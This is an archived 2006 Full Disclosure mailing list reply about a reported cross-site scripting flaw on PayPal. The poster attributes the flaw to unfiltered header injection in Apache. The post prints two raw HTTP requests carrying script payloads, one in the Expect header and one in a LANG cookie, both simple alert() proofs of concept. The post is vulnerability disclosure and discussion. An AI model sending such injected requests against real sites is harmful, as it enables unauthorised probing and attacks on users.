Full Disclosure mailing list archives
Re: [x0n3-h4ck.org] PayPal vulnerable to XSS
From: "Debasis Mohanty" <debasis.mohanty.listmails () gmail com>
Date: Tue, 7 Nov 2006 07:55:06 -0800
I found a similar one long back in the "Expect" header but did not bother to post... However, this bug is not associated with the paypal application but rather with the Apache server *version* on which it is hosted. This kind of XSS are usually called as - "Unfiltered Header Injection in Apache". Check this - http://www.securityfocus.com/archive/1/433280 And here is mine. Look for the injection in "Expect" header - GET / HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.paypal.com Cookie: <some_cookie_value> cookie_check=yes;feel_cookie=-=your_favorite_cookie=-; Connection: Close Expect: <script>alert(whatever_you_like)</script> Pragma: no-cache Regards, -d -----Original Message----- From: full-disclosure-bounces () lists grok org uk [mailto:full-disclosure-bounces () lists grok org uk] On Behalf Of Andrew Farmer Sent: Monday, November 06, 2006 12:45 PM To: corrado.liotta@alice.itcorrado.liotta () alice it Cc: full-disclosure () lists grok org uk Subject: Re: [Full-disclosure] [x0n3-h4ck.org] PayPal vulnerable to XSS On 04 Nov 06, at 11:39, <corrado.liotta () alice it> <corrado.liotta () alice it> wrote:
this is a request, that I have passed server to the web, complete of the code that would allow the xss: GET / HTTP/1.0 Accept: */* User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; .NET CLR 1.1.4322) Host: www.paypal.com Cookie: cookie_check=yes;feel_cookie=
<snip big session cookies>
LANG=--><ScRiPt%20%0a%0d>alert(1234567890)%3B</ScRiPt>
<snip more cookies>
Connection: Close Pragma: no-cache
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- [x0n3-h4ck.org] PayPal vulnerable to XSS corrado.liotta (Nov 06)
- Re: [x0n3-h4ck.org] PayPal vulnerable to XSS Andrew Farmer (Nov 06)
- Re: [x0n3-h4ck.org] PayPal vulnerable to XSS Thierry Zoller (Nov 06)
- Re: [x0n3-h4ck.org] PayPal vulnerable to XSS Andrew Farmer (Nov 06)
- Re: [x0n3-h4ck.org] PayPal vulnerable to XSS Jason (Nov 06)
- Re: [x0n3-h4ck.org] PayPal vulnerable to XSS Debasis Mohanty (Nov 06)
- Re: [x0n3-h4ck.org] PayPal vulnerable to XSS Thierry Zoller (Nov 06)
- Re: [x0n3-h4ck.org] PayPal vulnerable to XSS Andrew Farmer (Nov 06)